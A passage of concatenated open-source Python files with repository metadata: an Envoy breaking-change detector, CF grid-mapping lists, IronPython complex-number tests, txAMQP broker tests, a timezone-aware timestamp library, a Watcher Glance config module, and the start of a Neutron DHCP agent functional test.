pull_buf_deps(
self._buf_path,
self._path_to_changed_dir,
config_file_loc=self._config_file_loc,
additional_args=self._additional_args)
def run_detector(self) -> None:
self._final_result = check_breaking(
self._buf_path,
self._path_to_changed_dir,
git_ref=self._git_ref,
git_path=self._git_path,
subdir=self._subdir,
config_file_loc=self._config_file_loc,
additional_args=self._additional_args)
def is_breaking(self) -> bool:
if not self._final_result:
raise ChangeDetectorError("Must invoke run_detector() before checking if is_breaking()")
final_code, final_out, final_err = self._final_result
final_out, final_err = '\n'.join(final_out), '\n'.join(final_err)
if final_err != "":
raise ChangeDetectorError(f"Error from buf: {final_err}")
if final_code != 0:
return True
if final_out != "":
return True
return False
def get_breaking_changes(self) -> List[str]:
_, final_out, _ = self._final_result
return filter(lambda x: len(x) > 0, final_out) if self.is_breaking() else []
| envoyproxy/envoy | tools/api_proto_breaking_change_detector/detector.py | Python | apache-2.0 | 5,354 |
#!/usr/bin/env python
'''
Appendix F. Grid Mappings
---
Each recognized grid mapping is described in one of the sections below. Each
section contains: the valid name that is used with the grid_mapping_name
attribute; a list of the specific attributes that may be used to assign values
to the mapping's parameters; the standard names used to identify the coordinate
variables that contain the mapping's independent variables; and references to
the mapping's definition or other information that may help in using the
mapping. Since the attributes used to set a mapping's parameters may be shared
among several mappings, their definitions are contained in a table in the final
section. The attributes which describe the ellipsoid and prime meridian may be
included, when applicable, with any grid mapping.
We have used the FGDC "Content Standard for Digital Geospatial Metadata" [FGDC]
as a guide in choosing the values for grid_mapping_name and the attribute names
for the parameters describing map projections.
'''
grid_mapping_names = [
'albers_conical_equal_area',
'azimuthal_equidistant',
'lambert_azimuthal_equal_area',
'lambert_conformal_conic',
'lambert_cylindrical_equal_area',
'latitude_longitude',
'mercator',
'orthographic',
'polar_stereographic',
'rotated_latitude_longitude',
'stereographic',
'transverse_mercator',
'vertical_perspective' ]
grid_mapping_attrs = [
'earth_radius',
'false_easting',
'false_northing',
'grid_mapping_name',
'grid_north_pole_latitude',
'grid_north_pole_longitude',
'inverse_flattening',
'latitude_of_projection_origin',
'longitude_of_central_meridian',
'longitude_of_prime_meridian',
'longitude_of_projection_origin',
'north_pole_grid_longitude',
'perspective_point_height',
'scale_factor_at_central_meridian',
'scale_factor_at_projection_origin',
'semi_major_axis',
'semi_minor_axis',
'standard_parallel',
'straight_vertical_longitude_from_pole'
]
| webtrike/compliance-checker | compliance_checker/cf/appendix_f.py | Python | apache-2.0 | 2,157 |
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import unittest
from iptest.type_util import *
from iptest import run_test
class ComplexTest(unittest.TestCase):
def test_from_string(self):
# complex from string: negative
# - space related
l = ['1.2', '.3', '4e3', '.3e-4', "0.031"]
for x in l:
for y in l:
self.assertRaises(ValueError, complex, "%s +%sj" % (x, y))
self.assertRaises(ValueError, complex, "%s+ %sj" % (x, y))
self.assertRaises(ValueError, complex, "%s - %sj" % (x, y))
self.assertRaises(ValueError, complex, "%s- %sj" % (x, y))
self.assertRaises(ValueError, complex, "%s-\t%sj" % (x, y))
self.assertRaises(ValueError, complex, "%sj+%sj" % (x, y))
self.assertEqual(complex(" %s+%sj" % (x, y)), complex(" %s+%sj " % (x, y)))
def test_misc(self):
self.assertEqual(mycomplex(), complex())
a = mycomplex(1)
b = mycomplex(1,0)
c = complex(1)
d = complex(1,0)
for x in [a,b,c,d]:
for y in [a,b,c,d]:
self.assertEqual(x,y)
self.assertEqual(a ** 2, a)
self.assertEqual(a-complex(), a)
self.assertEqual(a+complex(), a)
self.assertEqual(complex()/a, complex())
self.assertEqual(complex()*a, complex())
self.assertEqual(complex()%a, complex())
self.assertEqual(complex() // a, complex())
self.assertEqual(complex(2), complex(2, 0))
def test_inherit(self):
class mycomplex(complex): pass
a = mycomplex(2+1j)
self.assertEqual(a.real, 2)
self.assertEqual(a.imag, 1)
def test_repr(self):
self.assertEqual(repr(1-6j), '(1-6j)')
def test_infinite(self):
self.assertEqual(repr(1.0e340j), 'infj')
self.assertEqual(repr(-1.0e340j),'-infj')
run_test(__name__)
| slozier/ironpython2 | Tests/test_complex.py | Python | apache-2.0 | 2,104 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from txamqp.client import Closed
from txamqp.queue import Empty
from txamqp.content import Content
from txamqp.testlib import TestBase, supportedBrokers, QPID, OPENAMQ
from twisted.internet.defer import inlineCallbacks
class ASaslPlainAuthenticationTest(TestBase):
"""Test for SASL PLAIN authentication Broker functionality"""
@inlineCallbacks
def authenticate(self,client,user,password):
yield client.authenticate(user, password,mechanism='PLAIN')
@inlineCallbacks
def test_sasl_plain(self):
channel = yield self.client.channel(200)
yield channel.channel_open()
yield channel.channel_close()
class ASaslAmqPlainAuthenticationTest(TestBase):
"""Test for SASL AMQPLAIN authentication Broker functionality"""
@inlineCallbacks
def authenticate(self,client,user,password):
yield client.authenticate(user, password,mechanism='AMQPLAIN')
@inlineCallbacks
def test_sasl_amq_plain(self):
channel = yield self.client.channel(200)
yield channel.channel_open()
yield channel.channel_close()
class BrokerTests(TestBase):
"""Tests for basic Broker functionality"""
@inlineCallbacks
def test_amqp_basic_13(self):
"""
First, this test tries to receive a message with a no-ack
consumer. Second, this test tries to explicitely receive and
acknowledge a message with an acknowledging consumer.
"""
ch = self.channel
yield self.queue_declare(ch, queue = "myqueue")
# No ack consumer
ctag = (yield ch.basic_consume(queue = "myqueue", no_ack = True)).consumer_tag
body = "test no-ack"
ch.basic_publish(routing_key = "myqueue", content = Content(body))
msg = yield ((yield self.client.queue(ctag)).get(timeout = 5))
self.assert_(msg.content.body == body)
# Acknowleding consumer
yield self.queue_declare(ch, queue = "otherqueue")
ctag = (yield ch.basic_consume(queue = "otherqueue", no_ack = False)).consumer_tag
body = "test ack"
ch.basic_publish(routing_key = "otherqueue", content = Content(body))
msg = yield ((yield self.client.queue(ctag)).get(timeout = 5))
ch.basic_ack(delivery_tag = msg.delivery_tag)
self.assert_(msg.content.body == body)
@inlineCallbacks
def test_basic_delivery_immediate(self):
"""
Test basic message delivery where consume is issued before publish
"""
channel = self.channel
yield self.exchange_declare(channel, exchange="test-exchange", type="direct")
yield self.queue_declare(channel, queue="test-queue")
yield channel.queue_bind(queue="test-queue", exchange="test-exchange", routing_key="key")
reply = yield channel.basic_consume(queue="test-queue", no_ack=True)
queue = yield self.client.queue(reply.consumer_tag)
body = "Immediate Delivery"
channel.basic_publish(exchange="test-exchange", routing_key="key", content=Content(body), immediate=True)
msg = yield queue.get(timeout=5)
self.assert_(msg.content.body == body)
# TODO: Ensure we fail if immediate=True and there's no consumer.
@inlineCallbacks
def test_basic_delivery_queued(self):
"""
Test basic message delivery where publish is issued before consume
(i.e. requires queueing of the message)
"""
channel = self.channel
yield self.exchange_declare(channel, exchange="test-exchange", type="direct")
yield self.queue_declare(channel, queue="test-queue")
yield channel.queue_bind(queue="test-queue", exchange="test-exchange", routing_key="key")
body = "Queued Delivery"
channel.basic_publish(exchange="test-exchange", routing_key="key", content=Content(body))
reply = yield channel.basic_consume(queue="test-queue", no_ack=True)
queue = yield self.client.queue(reply.consumer_tag)
msg = yield queue.get(timeout=5)
self.assert_(msg.content.body == body)
@inlineCallbacks
def test_invalid_channel(self):
channel = yield self.client.channel(200)
try:
yield channel.queue_declare(exclusive=True)
self.fail("Expected error on queue_declare for invalid channel")
except Closed, e:
self.assertConnectionException(504, e.args[0])
@inlineCallbacks
def test_closed_channel(self):
channel = yield self.client.channel(200)
yield channel.channel_open()
yield channel.channel_close()
try:
yield channel.queue_declare(exclusive=True)
self.fail("Expected error on queue_declare for closed channel")
except Closed, e:
self.assertConnectionException(504, e.args[0])
@supportedBrokers(QPID, OPENAMQ)
@inlineCallbacks
def test_channel_flow(self):
channel = self.channel
yield channel.queue_declare(queue="flow_test_queue", exclusive=True)
yield channel.basic_consume(consumer_tag="my-tag", queue="flow_test_queue")
incoming = yield self.client.queue("my-tag")
yield channel.channel_flow(active=False)
channel.basic_publish(routing_key="flow_test_queue", content=Content("abcdefghijklmnopqrstuvwxyz"))
try:
yield incoming.get(timeout=1)
self.fail("Received message when flow turned off.")
except Empty: None
yield channel.channel_flow(active=True)
msg = yield incoming.get(timeout=1)
self.assertEqual("abcdefghijklmnopqrstuvwxyz", msg.content.body)
| beevek/txamqp | src/txamqp/test/test_broker.py | Python | apache-2.0 | 6,431 |
#!/usr/bin/env python
# Copyright 2002 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of classes and functions for dealing with dates and timestamps.
The BaseTimestamp and Timestamp are timezone-aware wrappers around Python
datetime.datetime class.
"""
import calendar
import copy
import datetime
import re
import sys
import time
import types
import warnings
from dateutil import parser
import pytz
_MICROSECONDS_PER_SECOND = 1000000
_MICROSECONDS_PER_SECOND_F = float(_MICROSECONDS_PER_SECOND)
def SecondsToMicroseconds(seconds):
"""Convert seconds to microseconds.
Args:
seconds: number
Returns:
microseconds
"""
return seconds * _MICROSECONDS_PER_SECOND
def MicrosecondsToSeconds(microseconds):
"""Convert microseconds to seconds.
Args:
microseconds: A number representing some duration of time measured in
microseconds.
Returns:
A number representing the same duration of time measured in seconds.
"""
return microseconds / _MICROSECONDS_PER_SECOND_F
def _GetCurrentTimeMicros():
"""Get the current time in microseconds, in UTC.
Returns:
The number of microseconds since the epoch.
"""
return int(SecondsToMicroseconds(time.time()))
def GetSecondsSinceEpoch(time_tuple):
"""Convert time_tuple (in UTC) to seconds (also in UTC).
Args:
time_tuple: tuple with at least 6 items.
Returns:
seconds.
"""
return calendar.timegm(time_tuple[:6] + (0, 0, 0))
def GetTimeMicros(time_tuple):
"""Get a time in microseconds.
Arguments:
time_tuple: A (year, month, day, hour, minute, second) tuple (the python
time tuple format) in the UTC time zone.
Returns:
The number of microseconds since the epoch represented by the input tuple.
"""
return int(SecondsToMicroseconds(GetSecondsSinceEpoch(time_tuple)))
def DatetimeToUTCMicros(date):
"""Converts a datetime object to microseconds since the epoch in UTC.
Args:
date: A datetime to convert.
Returns:
The number of microseconds since the epoch, in UTC, represented by the input
datetime.
"""
# Using this guide: http://wiki.python.org/moin/WorkingWithTime
# And this conversion guide: http://docs.python.org/library/time.html
# Turn the date parameter into a tuple (struct_time) that can then be
# manipulated into a long value of seconds. During the conversion from
# struct_time to long, the source date in UTC, and so it follows that the
# correct transformation is calendar.timegm()
micros = calendar.timegm(date.utctimetuple()) * _MICROSECONDS_PER_SECOND
return micros + date.microsecond
def DatetimeToUTCMillis(date):
"""Converts a datetime object to milliseconds since the epoch in UTC.
Args:
date: A datetime to convert.
Returns:
The number of milliseconds since the epoch, in UTC, represented by the input
datetime.
"""
return DatetimeToUTCMicros(date) / 1000
def UTCMicrosToDatetime(micros, tz=None):
"""Converts a microsecond epoch time to a datetime object.
Args:
micros: A UTC time, expressed in microseconds since the epoch.
tz: The desired tzinfo for the datetime object. If None, the
datetime will be naive.
Returns:
The datetime represented by the input value.
"""
# The conversion from micros to seconds for input into the
# utcfromtimestamp function needs to be done as a float to make sure
# we dont lose the sub-second resolution of the input time.
dt = datetime.datetime.utcfromtimestamp(
micros / _MICROSECONDS_PER_SECOND_F)
if tz is not None:
dt = tz.fromutc(dt)
return dt
def UTCMillisToDatetime(millis, tz=None):
"""Converts a millisecond epoch time to a datetime object.
Args:
millis: A UTC time, expressed in milliseconds since the epoch.
tz: The desired tzinfo for the datetime object. If None, the
datetime will be naive.
Returns:
The datetime represented by the input value.
"""
return UTCMicrosToDatetime(millis * 1000, tz)
UTC = pytz.UTC
US_PACIFIC = pytz.timezone('US/Pacific')
class TimestampError(ValueError):
"""Generic timestamp-related error."""
pass
class TimezoneNotSpecifiedError(TimestampError):
"""This error is raised when timezone is not specified."""
pass
class TimeParseError(TimestampError):
"""This error is raised when we can't parse the input."""
pass
# TODO(user): this class needs to handle daylight better
class LocalTimezoneClass(datetime.tzinfo):
"""This class defines local timezone."""
ZERO = datetime.timedelta(0)
HOUR = datetime.timedelta(hours=1)
STDOFFSET = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
DSTOFFSET = datetime.timedelta(seconds=-time.altzone)
else:
DSTOFFSET = STDOFFSET
DSTDIFF = DSTOFFSET - STDOFFSET
def utcoffset(self, dt):
"""datetime -> minutes east of UTC (negative for west of UTC)."""
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC."""
if self._isdst(dt):
return self.DSTDIFF
else:
return self.ZERO
def tzname(self, dt):
"""datetime -> string name of time zone."""
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
"""Return true if given datetime is within local DST."""
tt = (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second,
dt.weekday(), 0, -1)
stamp = time.mktime(tt)
tt = time.localtime(stamp)
return tt.tm_isdst > 0
def __repr__(self):
"""Return string '<Local>'."""
return '<Local>'
def localize(self, dt, unused_is_dst=False):
"""Convert naive time to local time."""
if dt.tzinfo is not None:
raise ValueError('Not naive datetime (tzinfo is already set)')
return dt.replace(tzinfo=self)
def normalize(self, dt, unused_is_dst=False):
"""Correct the timezone information on the given datetime."""
if dt.tzinfo is None:
raise ValueError('Naive time - no tzinfo set')
return dt.replace(tzinfo=self)
LocalTimezone = LocalTimezoneClass()
class BaseTimestamp(datetime.datetime):
"""Our kind of wrapper over datetime.datetime.
The objects produced by methods now, today, fromtimestamp, utcnow,
utcfromtimestamp are timezone-aware (with correct timezone).
We also overload __add__ and __sub__ method, to fix the result of arithmetic
operations.
"""
LocalTimezone = LocalTimezone
@classmethod
def AddLocalTimezone(cls, obj):
"""If obj is naive, add local timezone to it."""
if not obj.tzinfo:
return obj.replace(tzinfo=cls.LocalTimezone)
return obj
@classmethod
def Localize(cls, obj):
"""If obj is naive, localize it to cls.LocalTimezone."""
if not obj.tzinfo:
return cls.LocalTimezone.localize(obj)
return obj
def __add__(self, *args, **kwargs):
"""x.__add__(y) <==> x+y."""
r = super(BaseTimestamp, self).__add__(*args, **kwargs)
return type(self)(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
def __sub__(self, *args, **kwargs):
"""x.__add__(y) <==> x-y."""
r = super(BaseTimestamp, self).__sub__(*args, **kwargs)
if isinstance(r, datetime.datetime):
return type(self)(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
return r
@classmethod
def now(cls, *args, **kwargs):
"""Get a timestamp corresponding to right now.
Args:
args: Positional arguments to pass to datetime.datetime.now().
kwargs: Keyword arguments to pass to datetime.datetime.now(). If tz is not
specified, local timezone is assumed.
Returns:
A new BaseTimestamp with tz's local day and time.
"""
return cls.AddLocalTimezone(
super(BaseTimestamp, cls).now(*args, **kwargs))
@classmethod
def today(cls):
"""Current BaseTimestamp.
Same as self.__class__.fromtimestamp(time.time()).
Returns:
New self.__class__.
"""
return cls.AddLocalTimezone(super(BaseTimestamp, cls).today())
@classmethod
def fromtimestamp(cls, *args, **kwargs):
"""Get a new localized timestamp from a POSIX timestamp.
Args:
args: Positional arguments to pass to datetime.datetime.fromtimestamp().
kwargs: Keyword arguments to pass to datetime.datetime.fromtimestamp().
If tz is not specified, local timezone is assumed.
Returns:
A new BaseTimestamp with tz's local day and time.
"""
return cls.Localize(
super(BaseTimestamp, cls).fromtimestamp(*args, **kwargs))
@classmethod
def utcnow(cls):
"""Return a new BaseTimestamp representing UTC day and time."""
return super(BaseTimestamp, cls).utcnow().replace(tzinfo=pytz.utc)
@classmethod
def utcfromtimestamp(cls, *args, **kwargs):
"""timestamp -> UTC datetime from a POSIX timestamp (like time.time())."""
return super(BaseTimestamp, cls).utcfromtimestamp(
*args, **kwargs).replace(tzinfo=pytz.utc)
@classmethod
def strptime(cls, date_string, format, tz=None):
"""Parse date_string according to format and construct BaseTimestamp.
Args:
date_string: string passed to time.strptime.
format: format string passed to time.strptime.
tz: if not specified, local timezone assumed.
Returns:
New BaseTimestamp.
"""
if tz is None:
return cls.Localize(cls(*(time.strptime(date_string, format)[:6])))
return tz.localize(cls(*(time.strptime(date_string, format)[:6])))
def astimezone(self, *args, **kwargs):
"""tz -> convert to time in new timezone tz."""
r = super(BaseTimestamp, self).astimezone(*args, **kwargs)
return type(self)(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
@classmethod
def FromMicroTimestamp(cls, ts):
"""Create new Timestamp object from microsecond UTC timestamp value.
Args:
ts: integer microsecond UTC timestamp
Returns:
New cls()
"""
return cls.utcfromtimestamp(ts/_MICROSECONDS_PER_SECOND_F)
def AsSecondsSinceEpoch(self):
"""Return number of seconds since epoch (timestamp in seconds)."""
return GetSecondsSinceEpoch(self.utctimetuple())
def AsMicroTimestamp(self):
"""Return microsecond timestamp constructed from this object."""
return (SecondsToMicroseconds(self.AsSecondsSinceEpoch()) +
self.microsecond)
@classmethod
def combine(cls, datepart, timepart, tz=None):
"""Combine date and time into timestamp, timezone-aware.
Args:
datepart: datetime.date
timepart: datetime.time
tz: timezone or None
Returns:
timestamp object
"""
result = super(BaseTimestamp, cls).combine(datepart, timepart)
if tz:
result = tz.localize(result)
return result
# Conversions from interval suffixes to number of seconds.
# (m => 60s, d => 86400s, etc)
_INTERVAL_CONV_DICT = {'s': 1}
_INTERVAL_CONV_DICT['m'] = 60 * _INTERVAL_CONV_DICT['s']
_INTERVAL_CONV_DICT['h'] = 60 * _INTERVAL_CONV_DICT['m']
_INTERVAL_CONV_DICT['d'] = 24 * _INTERVAL_CONV_DICT['h']
_INTERVAL_CONV_DICT['D'] = _INTERVAL_CONV_DICT['d']
_INTERVAL_CONV_DICT['w'] = 7 * _INTERVAL_CONV_DICT['d']
_INTERVAL_CONV_DICT['W'] = _INTERVAL_CONV_DICT['w']
_INTERVAL_CONV_DICT['M'] = 30 * _INTERVAL_CONV_DICT['d']
_INTERVAL_CONV_DICT['Y'] = 365 * _INTERVAL_CONV_DICT['d']
_INTERVAL_REGEXP = re.compile('^([0-9]+)([%s])?' % ''.join(_INTERVAL_CONV_DICT))
def ConvertIntervalToSeconds(interval):
"""Convert a formatted string representing an interval into seconds.
Args:
interval: String to interpret as an interval. A basic interval looks like
"<number><suffix>". Complex intervals consisting of a chain of basic
intervals are also allowed.
Returns:
An integer representing the number of seconds represented by the interval
string, or None if the interval string could not be decoded.
"""
total = 0
while interval:
match = _INTERVAL_REGEXP.match(interval)
if not match:
return None
try:
num = int(match.group(1))
except ValueError:
return None
suffix = match.group(2)
if suffix:
multiplier = _INTERVAL_CONV_DICT.get(suffix)
if not multiplier:
return None
num *= multiplier
total += num
interval = interval[match.end(0):]
return total
class Timestamp(BaseTimestamp):
"""This subclass contains methods to parse W3C and interval date spec.
The interval date specification is in the form "1D", where "D" can be
"s"econds "m"inutes "h"ours "D"ays "W"eeks "M"onths "Y"ears.
"""
INTERVAL_CONV_DICT = _INTERVAL_CONV_DICT
INTERVAL_REGEXP = _INTERVAL_REGEXP
@classmethod
def _StringToTime(cls, timestring, tz=None):
"""Use dateutil.parser to convert string into timestamp.
dateutil.parser understands ISO8601 which is really handy.
Args:
timestring: string with datetime
tz: optional timezone, if timezone is omitted from timestring.
Returns:
New Timestamp or None if unable to parse the timestring.
"""
try:
r = parser.parse(timestring)
except ValueError:
return None
if not r.tzinfo:
r = (tz or cls.LocalTimezone).localize(r)
result = cls(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
return result
@classmethod
def _IntStringToInterval(cls, timestring):
"""Parse interval date specification and create a timedelta object.
Args:
timestring: string interval.
Returns:
A datetime.timedelta representing the specified interval or None if
unable to parse the timestring.
"""
seconds = ConvertIntervalToSeconds(timestring)
return datetime.timedelta(seconds=seconds) if seconds else None
@classmethod
def FromString(cls, value, tz=None):
"""Create a Timestamp from a string.
Args:
value: String interval or datetime.
e.g. "2013-01-05 13:00:00" or "1d"
tz: optional timezone, if timezone is omitted from timestring.
Returns:
A new Timestamp.
Raises:
TimeParseError if unable to parse value.
"""
result = cls._StringToTime(value, tz=tz)
if result:
return result
result = cls._IntStringToInterval(value)
if result:
return cls.utcnow() - result
raise TimeParseError(value)
# What's written below is a clear python bug. I mean, okay, I can apply
# negative timezone to it and end result will be inconversible.
MAXIMUM_PYTHON_TIMESTAMP = Timestamp(
9999, 12, 31, 23, 59, 59, 999999, UTC)
# This is also a bug. It is called 32bit time_t. I hate it.
# This is fixed in 2.5, btw.
MAXIMUM_MICROSECOND_TIMESTAMP = 0x80000000 * _MICROSECONDS_PER_SECOND - 1
MAXIMUM_MICROSECOND_TIMESTAMP_AS_TS = Timestamp(2038, 1, 19, 3, 14, 7, 999999)
| googlearchive/titan | titan/common/lib/google/apputils/datelib.py | Python | apache-2.0 | 15,413 |
# -*- encoding: utf-8 -*-
# Copyright (c) 2016 Intel Corp
#
# Authors: Prudhvi Rao Shedimbi <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
glance_client = cfg.OptGroup(name='glance_client',
title='Configuration Options for Glance')
GLANCE_CLIENT_OPTS = [
cfg.StrOpt('api_version',
default='2',
help='Version of Glance API to use in glanceclient.'),
cfg.StrOpt('endpoint_type',
default='publicURL',
help='Type of endpoint to use in glanceclient. '
'Supported values: internalURL, publicURL, adminURL. '
'The default is publicURL.'),
cfg.StrOpt('region_name',
help='Region in Identity service catalog to use for '
'communication with the OpenStack service.')]
def register_opts(conf):
conf.register_group(glance_client)
conf.register_opts(GLANCE_CLIENT_OPTS, group=glance_client)
def list_opts():
return [(glance_client, GLANCE_CLIENT_OPTS)]
| openstack/watcher | watcher/conf/glance_client.py | Python | apache-2.0 | 1,593 |
# Copyright (c) 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import os.path
import eventlet
import fixtures
import mock
import netaddr
from neutron_lib import constants as lib_const
from oslo_config import fixture as fixture_config
from oslo_utils import uuidutils
from neutron.agent.common import ovs_lib
from neutron.agent.dhcp import agent
from neutron.agent import dhcp_agent
from neutron.agent.linux import dhcp
from neutron.agent.linux import external_process
from neutron.agent.linux import interface
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils
from neutron.common import utils as common_utils
from neutron.conf.agent import common as config
from neutron.tests.common import net_helpers
from neutron.tests.functional.agent.linux import helpers
from neutron.tests.functional import base
class DHCPAgentOVSTestFramework(base.BaseSudoTestCase):
_DHCP_PORT_MAC_ADDRESS = netaddr.EUI("24:77:03:7d:00:4c")
_DHCP_PORT_MAC_ADDRESS.dialect = netaddr.mac_unix
_TENANT_PORT_MAC_ADDRESS = netaddr.EUI("24:77:03:7d:00:3a")
_TENANT_PORT_MAC_ADDRESS.dialect = netaddr.mac_unix
_IP_ADDRS = {
4: {'addr': '192.168.10.11',
'cidr': '192.168.10.0/24',
'gateway': '192.168.10.1'},
6: {'addr': '2001:db8:0:1::c0a8:a0b',
'cidr': '2001:db8:0:1::c0a8:a00/120',
'gateway': '2001:db8:0:1::c0a8:a01'}, }
def setUp(self):
super(DHCPAgentOVSTestFramework, self).setUp()
config.setup_logging()
self.conf_fixture = self.useFixture(fixture_config.Config())
self.conf = self.conf_fixture.conf
dhcp_agent.register_options(self.conf)
# NOTE(cbrandily): TempDir fixture creates a folder with 0o700
# permissions but agent dir must be readable by dnsmasq user (nobody)
agent_config_dir = self.useFixture(fixtures.TempDir()).path
self.useFixture(
helpers.RecursivePermDirFixture(agent_config_dir, 0o555))
self.conf.set_override("dhcp_confs", agent_config_dir)
self.conf.set_override(
'interface_driver',
'neutron.agent.linux.interface.OVSInterfaceDriver')
self.conf.set_override('report_interval', 0, 'AGENT')
br_int = self.useFixture(net_helpers.OVSBridgeFixture()).bridge
self.conf.set_override('ovs_integration_bridge', br_int.br_name)
self.mock_plugin_api = mock.patch(
'neutron.agent.dhcp.agent.DhcpPluginApi').start().return_value
mock.patch('neutron.agent.rpc.PluginReportStateAPI').start()
self.agent = agent.DhcpAgentWithStateReport('localhost')
self.ovs_driver = interface.OVSInterfaceDriver(self.conf)
self.conf.set_override('check_child_processes_interval', 1, 'AGENT')
def network_dict_for_dhcp(self, dhcp_enabled=True, ip_version=4,
prefix_override=None):
net_id = uuidutils.generate_uuid()
subnet_dict = self.create_subnet_dict(
net_id, dhcp_enabled, ip_version, prefix_override)
port_dict = self.create_port_dict(
net_id, subnet_dict.id,
mac_address=str(self._DHCP_PORT_MAC_ADDRESS),
ip_version=ip_version)
port_dict.device_id = common_utils.get_dhcp_agent_device_id(
net_id, self.conf.host)
net_dict = self.create_network_dict(
net_id, [subnet_dict], [port_dict])
return net_dict
def create_subnet_dict(self, net_id, dhcp_enabled=True, ip_version=4,
prefix_override=None):
cidr = self._IP_ADDRS[ip_version]['cidr']
if prefix_override is not None:
cidr = '/'.join((cidr.split('/')[0], str(prefix_override)))
sn_dict = dhcp.DictModel({
"id": uuidutils.generate_uuid(),
"network_id": net_id,
"ip_version": ip_version,
"cidr": cidr,
"gateway_ip": (self.
_IP_ADDRS[ip_version]['gateway']),
"enable_dhcp": dhcp_enabled,
"dns_nameservers": [],
"host_routes": [],
"ipv6_ra_mode": None,
"ipv6_address_mode": None})
if ip_version == 6:
sn_dict['ipv6_address_mode'] = lib_const.DHCPV6_STATEFUL
return sn_dict
def create_port_dict(self, network_id, subnet_id, mac_address,
ip_version=4, ip_address=None):
ip_address = (self._IP_ADDRS[ip_version]['addr']
if not ip_address else ip_address)
port_dict = dhcp.DictModel({
"id": uuidutils.generate_uuid(),
"name": "foo",
"mac_address": mac_address,
"network_id": network_id,
"admin_state_up": True,
"device_id": uuidutils.generate_uuid(),
"device_owner": "foo",
"fixed_ips": [{"subnet_id": subnet_id,
"ip_address": ip_address}], })
return port_dict
def create_network_dict(self, net_id, subnets=None, ports=None,
non_local_subnets=None):
subnets = [] if not subnets else subnets
ports = [] if not ports else ports
non_local_subnets = [] if not non_local_subnets else non_local_subnets
net_dict = dhcp.NetModel(d={
"id": net_id,
"subnets": subnets,
"non_local_subnets": non_local_subnets,
"ports": ports,
"admin_state_up": True,
"tenant_id": uuidutils.generate_uuid(), })
return net_dict
def get_interface_name(self, network, port):
device_manager = dhcp.DeviceManager(conf=self.conf, plugin=mock.Mock())
return device_manager.get_interface_name(network, port)
def configure_dhcp_for_network(self, network, dhcp_enabled=True):
self.agent.configure_dhcp_for_network(network)
self.addCleanup(self._cleanup_network, network, dhcp_enabled)
def _cleanup_network(self, network, dhcp_enabled):
self.mock_plugin_api.release_dhcp_port.return_value = None
if dhcp_enabled:
self.agent.call_driver('disable', network)
def assert_dhcp_resources(self, network, dhcp_enabled):
ovs = ovs_lib.BaseOVS()
port = network.ports[0]
iface_name = self.get_interface_name(network, port)
self.assertEqual(dhcp_enabled, ovs.port_exists(iface_name))
self.assert_dhcp_namespace(network.namespace, dhcp_enabled)
self.assert_accept_ra_disabled(network.namespace)
self.assert_dhcp_device(network.namespace, iface_name, dhcp_enabled)
def assert_dhcp_namespace(self, namespace, dhcp_enabled):
self.assertEqual(dhcp_enabled,
ip_lib.network_namespace_exists(namespace))
def assert_accept_ra_disabled(self, namespace):
actual = ip_lib.IPWrapper(namespace=namespace).netns.execute(
['sysctl', '-b', 'net.ipv6.conf.default.accept_ra'])
self.assertEqual('0', actual)
def assert_dhcp_device(self, namespace, dhcp_iface_name, dhcp_enabled):
dev = ip_lib.IPDevice(dhcp_iface_name, namespace)
self.assertEqual(dhcp_enabled, ip_lib.device_exists(
dhcp_iface_name, namespace))
if dhcp_enabled:
self.assertEqual(self._DHCP_PORT_MAC_ADDRESS, dev.link.address)
def _plug_port_for_dhcp_request(self, network, port):
namespace = network.namespace
vif_name = self.get_interface_name(network.id, port)
self.ovs_driver.plug(network.id, port.id, vif_name, port.mac_address,
self.conf['ovs_integration_bridge'],
namespace=namespace)
def _ip_list_for_vif(self, vif_name, namespace):
ip_device = ip_lib.IPDevice(vif_name, namespace)
return ip_device.addr.list(ip_version=4)
def _get_network_port_for_allocation_test(self):
network = self.network_dict_for_dhcp()
ip_addr = netaddr.IPNetwork(network.subnets[0].cidr)[1]
port = self.create_port_dict(
network.id, network.subnets[0].id,
